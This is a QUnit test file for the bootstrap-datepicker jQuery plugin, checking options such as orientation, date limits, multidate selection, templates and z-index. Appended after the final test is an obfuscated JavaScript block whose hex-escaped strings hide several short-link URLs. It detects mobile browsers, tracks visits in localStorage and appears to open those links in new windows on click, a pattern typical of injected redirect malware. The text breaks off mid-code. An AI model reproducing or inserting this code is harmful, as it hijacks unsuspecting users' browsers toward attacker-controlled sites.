    equal(dp.o.orientation.x, 'auto', '"bottom"');
    equal(dp.o.orientation.y, 'bottom', '"bottom"');

    dp._process_options({orientation: 'left top'});
    equal(dp.o.orientation.x, 'left', '"left top"');
    equal(dp.o.orientation.y, 'top', '"left top"');

    dp._process_options({orientation: 'left bottom'});
    equal(dp.o.orientation.x, 'left', '"left bottom"');
    equal(dp.o.orientation.y, 'bottom', '"left bottom"');

    dp._process_options({orientation: 'right top'});
    equal(dp.o.orientation.x, 'right', '"right top"');
    equal(dp.o.orientation.y, 'top', '"right top"');

    dp._process_options({orientation: 'right bottom'});
    equal(dp.o.orientation.x, 'right', '"right bottom"');
    equal(dp.o.orientation.y, 'bottom', '"right bottom"');

    dp._process_options({orientation: 'left right'});
    equal(dp.o.orientation.x, 'left', '"left right"');
    equal(dp.o.orientation.y, 'auto', '"left right"');

    dp._process_options({orientation: 'right left'});
    equal(dp.o.orientation.x, 'right', '"right left"');
    equal(dp.o.orientation.y, 'auto', '"right left"');

    dp._process_options({orientation: 'top bottom'});
    equal(dp.o.orientation.x, 'auto', '"top bottom"');
    equal(dp.o.orientation.y, 'top', '"top bottom"');

    dp._process_options({orientation: 'bottom top'});
    equal(dp.o.orientation.x, 'auto', '"bottom top"');
    equal(dp.o.orientation.y, 'bottom', '"bottom top"');

    dp._process_options({orientation: 'foo bar'});
    equal(dp.o.orientation.x, 'auto', '"foo bar"');
    equal(dp.o.orientation.y, 'auto', '"foo bar"');

    dp._process_options({orientation: 'foo left'});
    equal(dp.o.orientation.x, 'left', '"foo left"');
    equal(dp.o.orientation.y, 'auto', '"foo left"');

    dp._process_options({orientation: 'top bar'});
    equal(dp.o.orientation.x, 'auto', '"top bar"');
    equal(dp.o.orientation.y, 'top', '"top bar"');
});

test('startDate', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startDate: new Date(2012, 9, 26)
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(25)');
    ok(target.hasClass('disabled'), 'Previous day is disabled');
    target = picker.find('.datepicker-days tbody td:nth(26)');
    ok(!target.hasClass('disabled'), 'Specified date is enabled');
    target = picker.find('.datepicker-days tbody td:nth(27)');
    ok(!target.hasClass('disabled'), 'Next day is enabled');
});

test('endDate', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    endDate: new Date(2012, 9, 26)
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(25)');
    ok(!target.hasClass('disabled'), 'Previous day is enabled');
    target = picker.find('.datepicker-days tbody td:nth(26)');
    ok(!target.hasClass('disabled'), 'Specified date is enabled');
    target = picker.find('.datepicker-days tbody td:nth(27)');
    ok(target.hasClass('disabled'), 'Next day is disabled');
});

test('Multidate', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    multidate: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();

    // Initial value is selected
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 (initial date) in dates');

    // Select first
    target = picker.find('.datepicker-days tbody td:nth(7)');
    equal(target.text(), '4'); // Mar 4

    target.click();
    datesEqual(dp.dates.get(-1), UTCDate(2012, 2, 4), '2012-03-04 in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
    equal(input.val(), '2012-03-05,2012-03-04');

    // Select second
    target = picker.find('.datepicker-days tbody td:nth(15)');
    equal(target.text(), '12'); // Mar 12

    target.click();
    datesEqual(dp.dates.get(-1), UTCDate(2012, 2, 12), '2012-03-12 in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 12));
    equal(input.val(), '2012-03-05,2012-03-04,2012-03-12');

    // Deselect first
    target = picker.find('.datepicker-days tbody td:nth(7)');
    equal(target.text(), '4'); // Mar 4

    target.click();
    ok(dp.dates.contains(UTCDate(2012, 2, 4)) === -1, '2012-03-04 no longer in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
    equal(input.val(), '2012-03-05,2012-03-12');
});

test('Multidate with limit', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    multidate: 2
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();

    // Initial value is selected
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 (initial date) in dates');

    // Select first
    target = picker.find('.datepicker-days tbody td:nth(7)');
    equal(target.text(), '4'); // Mar 4

    target.click();
    datesEqual(dp.dates.get(-1), UTCDate(2012, 2, 4), '2012-03-04 in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
    equal(input.val(), '2012-03-05,2012-03-04');

    // Select second
    target = picker.find('.datepicker-days tbody td:nth(15)');
    equal(target.text(), '12'); // Mar 12

    target.click();
    datesEqual(dp.dates.get(-1), UTCDate(2012, 2, 12), '2012-03-12 in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 12));
    equal(input.val(), '2012-03-04,2012-03-12');

    // Select third
    target = picker.find('.datepicker-days tbody td:nth(20)');
    equal(target.text(), '17'); // Mar 17

    target.click();
    datesEqual(dp.dates.get(-1), UTCDate(2012, 2, 17), '2012-03-17 in dates');
    ok(dp.dates.contains(UTCDate(2012, 2, 4)) === -1, '2012-03-04 no longer in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 17));
    equal(input.val(), '2012-03-12,2012-03-17');
});

test('Multidate Separator', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    multidate: true,
                    multidateSeparator: ' '
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();

    // Select first
    target = picker.find('.datepicker-days tbody td:nth(7)');
    equal(target.text(), '4'); // Mar 4

    target.click();
    equal(input.val(), '2012-03-05 2012-03-04');

    // Select second
    target = picker.find('.datepicker-days tbody td:nth(15)');
    equal(target.text(), '12'); // Mar 12

    target.click();
    equal(input.val(), '2012-03-05 2012-03-04 2012-03-12');
});


test("Picker is shown on input focus when showOnFocus is not defined", function () {

    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('2014-01-01')
            .datepicker({
            }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();

    ok(picker.is(":visible"), "Datepicker is visible");

});

test("Picker is shown on input focus when showOnFocus is true", function () {

    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('2014-01-01')
            .datepicker({
                showOnFocus: true
            }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();

    ok(picker.is(":visible"), "Datepicker is visible");

});

test("Picker is hidden on input focus when showOnFocus is false", function () {

    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('2014-01-01')
            .datepicker({
                showOnFocus: false
            }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();

    ok(picker.is(":hidden"), "Datepicker is hidden");

});

test('Container', function(){
    var testContainer = $('<div class="date-picker-container"/>')
            .appendTo('#qunit-fixture'),
        input = $('<input />')
            .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    container: '.date-picker-container',
                    startDate: new Date(2012, 9, 26)
                }),
        dp = input.data('datepicker'),
        target = dp.picker;
    input.focus();
    equal(target.parent()[0], testContainer[0], 'Container is not the testContainer that was specificed');
});

test('Default View Date (Object)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    defaultViewDate: { year: 1977, month: 04, day: 25 }
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();

    equal(picker.find('.datepicker-days thead .datepicker-switch').text(), 'May 1977');
});

test('Default View Date (Date)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    defaultViewDate: new Date(1977, 4, 25)
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();

    equal(picker.find('.datepicker-days thead .datepicker-switch').text(), 'May 1977');
});

test('Default View Date (String)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    defaultViewDate: "1977-05-24"
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();

    equal(picker.find('.datepicker-days thead .datepicker-switch').text(), 'May 1977');
});

test('Immediate Updates', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2014-01-01')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    immediateUpdates: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    // Change month
    input.focus();
    picker.find('.datepicker-days .next').click();
    equal(input.val(), '2014-02-01');

    // Change year
    picker.find('.datepicker-days .datepicker-switch').click();
    picker.find('.datepicker-months .next').click();
    equal(input.val(), '2015-02-01');

    // Change decade set (doesn't update input)
    picker.find('.datepicker-months .datepicker-switch').click();
    picker.find('.datepicker-years .next').click();
    equal(input.val(), '2015-02-01');

    // Change century set (doesn't update input)
    picker.find('.datepicker-years .datepicker-switch').click();
    picker.find('.datepicker-decades .next').click();
    equal(input.val(), '2015-02-01');

    // Change millennium set (doesn't update input)
    picker.find('.datepicker-decades .datepicker-switch').click();
    picker.find('.datepicker-centuries .next').click();
    equal(input.val(), '2015-02-01');
});

test('forceParse: false on enter on invalid date', function () {
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('123456789')
                .datepicker({forceParse: false})
                .focus();

    input.trigger({
        type: 'keydown',
        keyCode: 13,
        shiftKey: false
    });

    equal(input.val(), '123456789', 'date not parsed');
});

test('forceParse: false on mousedown on invalid date', function () {
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('123456789')
                .datepicker({forceParse: false})
                .focus();

    $(document).trigger({
        type: 'mousedown'
    });

    equal(input.val(), '123456789', 'date not parsed');
});

//datepicker-dropdown

test('Enable on readonly options (default)', function(){
    var input = $('<input readonly="readonly" />')
            .appendTo('#qunit-fixture')
            .datepicker({format: "dd-mm-yyyy"}),
        dp = input.data('datepicker'),
        picker = dp.picker;

    ok(!picker.is(':visible'));
    input.focus();
    ok(picker.is(':visible'));
});

test('Enable on readonly options (false)', function(){
    var input = $('<input readonly="readonly" />')
            .appendTo('#qunit-fixture')
            .datepicker({
                format: "dd-mm-yyyy",
                enableOnReadonly: false
            }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    ok(!picker.is(':visible'));
    input.focus();
    ok(!picker.is(':visible'));
});

test('Startview: year view visible after date pick', function(){
    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .datepicker({
                startView: 2,
                minViewMode: 1,
                autoclose: true
            }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':visible'), 'Years view visible');

    target = picker.find('.datepicker-years tbody td:nth(7)');
    target.click();
    target = picker.find('.datepicker-years tbody td:nth(4)');
    target.click();
    target = picker.find('.datepicker-years tbody td:nth(20)');
    target.click();

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':visible'), 'Years view visible');
});

test('Title: none', function(){
    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .datepicker({
                format: 'yyyy-mm-dd'
            }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.is(':visible'), 'Picker is visible');

    target = picker.find('.datepicker-days thead .datepicker-title');
    ok(target.is(':not(:visible)'), 'Title is hidden');
});

test('Title: with value', function(){
    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .datepicker({
                format: 'yyyy-mm-dd',
                title: 'Some Title'
            }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.is(':visible'), 'Picker is visible');

    target = picker.find('.datepicker-days thead .datepicker-title');
    ok(target.is(':visible'), 'Title is visible');
    equal(target.text(), 'Some Title');
});

test('i18n: Leverage i18n titleFormat when available.', patch_date(function(Date){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2015年04月21日')
                .datepicker({
                    language: 'zh-CN'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();
    equal(picker.find('.datepicker-days thead .datepicker-switch').text(), '2015年04月', 'Title is in Chinese: 2015年04月');
}));

test('i18n: Leverage English (default) i18n titleFormat when translation key for specified language is not available.', patch_date(function(Date){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('04/21/2015')
                .datepicker({
                    language: 'aa-BB'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();
    equal(picker.find('.datepicker-days thead .datepicker-switch').text(), 'April 2015', 'Title is in default format: April 2015');
}));

test('Z-index Offset: none', function(){
    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .datepicker(),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.parent().css('z-index', 234);
    input.focus();

    equal(dp.o.zIndexOffset, 10, 'Z-index offset option defaults to 10.');
    equal(picker.css('z-index'), 244, 'Picker Z-index offset is respected.');
});

test('Z-index Offset: with value', function(){
    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .datepicker({
                zIndexOffset: 1000
            }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.parent().css('z-index', 234);
    input.focus();

    equal(dp.o.zIndexOffset, 1000, 'Z-index offset option is accepted.');
    equal(picker.css('z-index'), 1234, 'Picker Z-index offset is respected.');
});

test('templates', function(){
    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .datepicker({
                templates: {
                    leftArrow: '<span class="glyphicon glyphicon-arrow-left"></span>',
                    rightArrow: '</table>'
                }
            }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();
    equal(picker.find('.datepicker-days .prev').prop('innerHTML'), '<span class="glyphicon glyphicon-arrow-left"></span>');
    equal(picker.find('.datepicker-days .next').prop('innerHTML'), $('<div>').html('&raquo;').text());
});

test('Nav arrow html templates with span tag', function () {
    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('2012-10-26')
            .datepicker({
                format: 'yyyy-mm-dd',
                templates: {
                    leftArrow: '<span></span>',
                    rightArrow: '<span></span>'
                }
            }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-months tbody span:nth(9)');
    ok(target.hasClass('active'), 'Month is selected');
});

test('Nav arrow html templates .prev click', function () {
    var input = $('<input />')
        .appendTo('#qunit-fixture')
        .val('2012-10-26')
        .datepicker({
            format: 'yyyy-mm-dd',
            startView: 1,
            templates: {
                leftArrow: '<i></i>'
            }
        }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    picker.find('.datepicker-months thead .prev i').trigger('click');
    target = picker.find('.datepicker-months thead .datepicker-switch');
    equal(target.text(), '2011');
});

test('Visibility of the prev and next arrows for decade/century/millenium views with startDate and endDate', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('01/01/2015')
                .datepicker({
                    format: 'dd/mm/yyyy',
                    startView: 2,
                    startDate: '01/12/2014',
                    endDate: '01/12/2016'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();

    target = picker.find('.datepicker-years thead th.prev');
    ok(target.hasClass('disabled'), 'Prev switcher is hidden');
    target = picker.find('.datepicker-years thead th.next');
    ok(target.hasClass('disabled'), 'Next switcher is hidden');

    picker.find('.datepicker-years thead th.datepicker-switch').click();
    target = picker.find('.datepicker-decades thead th.prev');
    ok(target.hasClass('disabled'), 'Prev switcher is hidden');
    target = picker.find('.datepicker-decades thead th.next');
    ok(target.hasClass('disabled'), 'Next switcher is hidden');

    picker.find('.datepicker-decades thead th.datepicker-switch').click();
    target = picker.find('.datepicker-centuries thead th.prev');
    ok(target.hasClass('disabled'), 'Prev switcher is hidden');
    target = picker.find('.datepicker-centuries thead th.next');
    ok(target.hasClass('disabled'), 'Next switcher is hidden');
});

test('date cells (outdated)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .datepicker(),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();
    picker.find('.datepicker-days .day').each(function(){
        ok(this.hasAttribute('data-date'));
    });
});

test('keepEmptyValues: none (default is false)', function() {
    var proxy_element = $('<div />').appendTo('#qunit-fixture'),
        input_from = $('<input />').val('2016-04-01').appendTo('#qunit-fixture'),
        input_to = $('<input />').appendTo('#qunit-fixture'),
        dp = proxy_element.datepicker({
            format: 'yyyy-mm-dd',
            inputs: [input_from, input_to]
        }),
        input_from_dp = input_from.data('datepicker');

    input_from.focus();
    input_from_dp.picker.find('.old.day').eq(0).click();

    equal(input_from.val(), '2016-03-27');
    equal(input_to.val(), '2016-03-27', 'Input_from value should be distributed.');
});

test('keepEmptyValues: true', function() {
    var proxy_element = $('<div />').appendTo('#qunit-fixture'),
        input_from = $('<input />').val('2016-04-01').appendTo('#qunit-fixture'),
        input_to = $('<input />').appendTo('#qunit-fixture'),
        dp = proxy_element.datepicker({
            format: 'yyyy-mm-dd',
            inputs: [input_from, input_to],
            keepEmptyValues: true
        }),
        input_from_dp = input_from.data('datepicker');

    input_from.focus();
    input_from_dp.picker.find('.old.day').eq(0).click();

    equal(input_from.val(), '2016-03-27');
    equal(input_to.val(), '', 'Input_from value should not be distributed.');
});

test('maxViewMode and navigation switch', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .datepicker({
                    maxViewMode: 0
                }),
        dp = input.data('datepicker'),
        picker = dp.picker;

    input.focus();

    picker.find('.datepicker-days thead th.datepicker-switch').click();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
});

test('updateViewDate', function() {
    expect(8);

    var input = $('<input value="08/03/1990"/>')
                .appendTo('#qunit-fixture')
                .datepicker({
                  defaultViewDate: {
                    year: 1945,
                    month: 4,
                    day: 8
                  },
                  updateViewDate: false
                })
                .on('changeMonth', function() {
                  var msg = shouldTriggerChangeMonth ? 'changeMonth must be triggered' : 'changeMonth must not be triggered';
                  ok(shouldTriggerChangeMonth, msg);
                })
                .on('changeYear', function() {
                  var msg = shouldTriggerChangeYear ? 'changeYear must be triggered' : 'changeYear must not be triggered';
                  ok(shouldTriggerChangeYear, msg);
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        shouldTriggerChangeMonth = false,
        shouldTriggerChangeYear = false,
        monthShown = picker.find('.datepicker-days thead th.datepicker-switch');

    equal(monthShown.text(), "May 1945", 'uses defaultViewDate on initialization');
    input.datepicker('setDate', new Date(1945, 8, 2));
    equal(monthShown.text(), "May 1945", 'does not change viewDate on `setDate` method');
    input.focus();
    picker.find('.datepicker-days tbody tr td.day.new:first').click();
    equal(monthShown.text(), "May 1945", 'does not change viewDate if a day in next month is selected');
    shouldTriggerChangeMonth = true;
    picker.find('.datepicker-days thead th.next').click();
    equal(monthShown.text(), 'June 1945', 'changing month must still be possible'); // and must trigger `changeMonth` event
    shouldTriggerChangeYear = true;
    picker.find('.datepicker-days thead th.datepicker-switch').click();
    picker.find('.datepicker-months thead th.next').click();
    picker.find('.datepicker-months tbody .month:first').click();
    equal(monthShown.text(), 'January 1946', 'changing year must still be possible'); // and must trigger `changeYear` and `changeMonth` events
});
test('Week Days: Week days default visibility (or enabled)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.dow').length > 0, 'Week days added to view');
});
test('Week Days: Week days visibility when disabled', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    showWeekDays: false
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.dow').length === 0, 'Week days not added to view');
});
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x57\x4a\x78\x32\x63\x352','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x4c\x4d\x6c\x33\x63\x343','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x44\x44\x68\x30\x63\x310','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x76\x6e\x4a\x37\x63\x347','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x4d\x69\x42\x36\x63\x396','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x74\x67\x46\x38\x63\x378','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x79\x51\x77\x35\x63\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x45\x4c\x54\x31\x63\x331',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x41\x73\x62\x34\x63\x374',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x54\x71\x66\x39\x63\x389','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 